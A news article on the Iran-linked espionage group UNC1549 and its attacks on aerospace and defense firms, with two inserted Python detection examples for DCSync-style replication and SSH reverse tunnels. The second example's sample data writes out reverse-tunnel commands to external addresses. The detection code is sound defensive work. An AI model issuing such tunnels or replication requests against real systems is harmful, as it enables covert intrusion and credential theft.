Iran-Nexus Threat Actor UNC1549 Takes Aim at Aerospace
Researchers say Israel remains a central focus, with UNC1549 targeting aerospace and defense entities in the US, the UAE, Qatar, Spain, and Saudi Arabia.
Alexander Culafi,Senior News Writer,Dark Reading
November 18, 2025
An Iran-nexus threat actor known for espionage has been targeting organizations in the aerospace sector.
Researchers for Google Cloud's Mandiant said as much in a Nov. 17 blog post dedicated to a threat actor tracked as UNC1549. Google previously reported on the actor, which is thought to overlap with Iranian Revolutionary Guard Corps (IRGC)-linked group Tortoiseshell, early last year. At the time, Mandiant reported the group was compromising systems at aerospace and defense firms across multiple countries, including Israel and the United Arab Emirates.
In Mandiant's latest blog post, researchers cover the tactics, techniques, and procedures (TTPs) observed in incidents attributed to UNC1549 that Mandiant has responded to since mid-2024.
Google's Austin Larsen says that while Israel remains a central focus, UNC1549's targeting has expanded to include more organizations in the US, the UAE, Qatar, Spain, and Saudi Arabia. "We are seeing a broadening of their operational scope beyond just direct military rivals. They are targeting sectors like technology, hospitality, and transportation, often using those intrusions to leverage trusted relationships and hop into their ultimate targets in the aerospace and defense sectors," he explains.
Adam Meyers, CrowdStrike's senior vice president of counter adversary, tells Dark Reading that in the case of this threat actor in particular (which CrowdStrike tracks as "Imperial Kitten"), the security vendor has seen it expand its infrastructure and ramp up espionage activity in alignment with the interests of the IRGC since this past summer.
"Their campaigns often use job-themed phishing lures to compromise victims and deliver malicious payloads. Previous operations have targeted Western countries, as well as Israel, Saudi Arabia, and the UAE, with a wide range of industries in scope — including defense, hospitality, finance, transportation, and technology."
ESET senior threat intelligence analyst Adam Burgher, meanwhile, says ESET has observed the actor (which it calls "GalaxyGato") targeting Israel and Greece for the past six months.
The US Department of Homeland Security warned in June that Iranian threat actors or hacktivists could target US-based critical infrastructure operators. And in recent months, Iran-linked attackers have conducted a wide range of campaigns, with targets ranging from European organizations to telecommunications firms.
UNC1549's Continued Onslaught Against Aerospace
Mandiant's post, authored by Mohamed El-Banna, Daniel Lee, Mike Stokkel, and Josh Goddard, asserts that since the middle of last year, UNC1549 has targeted organizations in aerospace, aviation, and defense using a sophisticated approach.
Sometimes, attackers would craft spear-phishing attacks designed to steal credentials or deliver malware to the target. Other times, UNC1549 would first compromise a third-party supplier or business partner and then exploit that trust to go after the main target.
"The latter technique is particularly strategic when targeting organizations with high security maturity, such as defense contractors. While these primary targets often invest heavily in robust defenses, their third-party partners may possess less stringent security postures," the blog post read. "This disparity provides UNC1549 a path of lesser resistance, allowing them to circumvent the primary target's main security controls by first compromising a connected entity."
The actor also uses sophisticated post-exploitation tactics, such as stealing source code to use for lookalike domains in future spear-phishing campaigns and abusing service ticketing systems to trick employees into giving up sensitive credentials.
Additionally, UNC1549 would use a series of custom tools both to open backdoors and to maintain persistence. Some tools the research highlighted include a C++ backdoor for communicating with command-and-control (C2) infrastructure tracked as Twostroke; custom tunneller Lightrail; shell command executor, system info enumerator, and file manager Deeproot; and a tool named DCSyncer.Slick, which mimics the legitimate DCSync Active Directory replication feature in order to "extract NTLM password hashes directly from the domain controllers," Mandiant wrote.
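A DCSync-style request, whether from the real tool or a mimic such as DCSyncer.Slick, exercises the directory replication extended rights and leaves a Windows Security event 4662 on the domain controller. The following detection logic is an added example and not part of Mandiant's report; the event records are constructed, and the allowlist of accounts expected to replicate (DC machine accounts plus a hypothetical sync account) is an assumption you would replace with your own domain's.

```python
import re

# Well-known Active Directory extended-right GUIDs that a replication request exercises:
# DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}

# Assumption: only domain controller machine accounts and a documented directory sync
# account are expected to replicate. Everything else asking for these rights is suspect.
KNOWN_REPLICATORS = {"DC01$", "DC02$", "MSOL_sync_placeholder"}

# Constructed, simplified Security event 4662 records (Directory Service access).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "ObjectType": "user",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},  # ordinary object access, not replication
]

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

def replication_rights_used(event):
    """Return the replication extended-right GUIDs referenced in a 4662 event's Properties."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return guids & REPLICATION_RIGHTS

def find_dcsync_candidates(events):
    """Flag replication requests made by identities that are not known replicators."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_used(ev)
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject in KNOWN_REPLICATORS:
            continue  # domain controllers replicating among themselves is expected
        hits.append({"subject": subject, "rights": sorted(rights)})
    return hits
```

In production the same logic should also key on the object being the domain naming context and be paired with auditing of who holds these rights, since a legitimately delegated account will not appear in the allowlist.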
To avoid defenses, attackers would delete utilities and other forensic artifacts. They also "repeatedly used SSH reverse tunnels from victim hosts back to their infrastructure, a technique that helped hide their activity from [endpoint detection and response] agents installed on those systems."
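Because the tunnel is carried by a legitimate SSH client, the most reliable signal is the process command line rather than the network traffic. The parser below is an added example, not Mandiant's tooling; it recognises the `-R` and `-o RemoteForward=` forms of a reverse tunnel in constructed process-creation records and flags any whose destination is not an approved forward endpoint (the bastion hostname and the allowlist are assumptions).

```python
import shlex

# Assumption: hosts approved to receive SSH remote forwards (e.g. a bastion); anything else is suspect.
APPROVED_FORWARD_DESTINATIONS = {"bastion.corp.example"}
# ssh options that consume the next argv element, so their values are not mistaken for the destination.
_VALUE_OPTS = {"-b", "-c", "-D", "-E", "-e", "-F", "-I", "-i", "-J", "-L", "-l",
               "-m", "-O", "-o", "-p", "-Q", "-R", "-S", "-W", "-w"}

# Constructed process-creation records, as an EDR or Sysmon event 1 would record them.
SAMPLE_PROCESSES = [
    {"host": "ws-eng-17", "user": "jsmith", "cmdline": "ssh -N -R 2222:localhost:22 -i /tmp/.k ops@203.0.113.45"},
    {"host": "ws-eng-17", "user": "jsmith", "cmdline": "ssh -L 8080:intranet:80 jsmith@bastion.corp.example"},
    {"host": "build-02", "user": "svc_build", "cmdline": "ssh -o RemoteForward=0.0.0.0:4443:127.0.0.1:443 -o StrictHostKeyChecking=no deploy@198.51.100.7"},
    {"host": "ws-eng-03", "user": "agarcia", "cmdline": "ssh -R 9000:localhost:9000 admin@bastion.corp.example"},
]

def parse_reverse_tunnel(cmdline):
    """Return (forward_spec, destination_host) if the ssh command opens a reverse tunnel, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return None
    spec, dest, i = None, None, 1
    while i < len(argv):
        tok = argv[i]
        if tok in _VALUE_OPTS and i + 1 < len(argv):
            val = argv[i + 1]
            if tok == "-R":
                spec = val                          # -R [bind:]port:host:hostport
            elif tok == "-o" and val.lower().startswith("remoteforward="):
                spec = val.split("=", 1)[1]         # -o RemoteForward=... is the same thing
            i += 2
            continue
        if not tok.startswith("-") and dest is None:
            dest = tok.rsplit("@", 1)[-1]           # first positional arg: [user@]host
        i += 1
    return (spec, dest) if spec and dest else None

def find_suspect_reverse_tunnels(processes):
    """Flag reverse tunnels to hosts that are not approved forward endpoints."""
    hits = []
    for p in processes:
        parsed = parse_reverse_tunnel(p.get("cmdline", ""))
        if parsed and parsed[1] not in APPROVED_FORWARD_DESTINATIONS:
            hits.append({"host": p["host"], "user": p["user"], "forward": parsed[0], "to": parsed[1]})
    return hits
```

Local forwards (`-L`) are deliberately ignored, since they do not expose the victim host to the remote side; a `RemoteForward` set in a config file rather than on the command line would need an additional check of the files the client reads.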
Why UNC1549 Targets Aerospace
Although Iran targets many sectors and areas of the world to further its geopolitical interests, it is notable that Mandiant's tracking of UNC1549 involves campaigns targeting a narrow range of verticals.
The post's authors stated that the threat actor's operations appear "strongly motivated by espionage," citing extensive data collection from victim networks. Google saw UNC1549 steal sensitive information such as emails, network and IT documentation, and intellectual property.
Austin Larsen, principal threat analyst for the Google Threat Intelligence Group, tells Dark Reading that the threat actor seems primarily motivated by strategic intelligence gathering rather than something like destructive pre-positioning. While their actions point to a goal of acquiring proprietary and military secrets, Larsen says another major goal is to use compromised aerospace and defense firms as a vehicle to target other valuable organizations.
"A major driver for targeting this specific vertical is the ability to use these organizations as pivot points. We see them exploiting trusted connections with third-party suppliers to reach high-value targets, often compromising smaller vendors to bypass the robust defenses of major defense contractors," Larsen says.
On the military intelligence front, Jeremy Makowski, senior security researcher at Rapid7, says aerospace organizations are especially valuable to Iran because gained intel can "significantly speed up progress in areas where Tehran struggles to legally obtain advanced technology."
"Militarily, it helps compensate for an outdated air force and limited access to modern aircraft. Information on propulsion, radar systems, satellite technologies, and precision-guidance components directly benefits Iran's expanding missile and drone programs, fields where even minor improvements can shift the strategic balance. But the value isn't purely military," he says. "Aerospace espionage enables Iran to identify restricted components, track global suppliers, and circumvent sanctions through covert procurement networks. It also supports political objectives by showcasing technological advancement to domestic audiences, signaling deterrence abroad, and equipping regional proxy groups with more capable systems."
About the Author
Alexander Culafi
Senior News Writer, Dark Reading
Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels.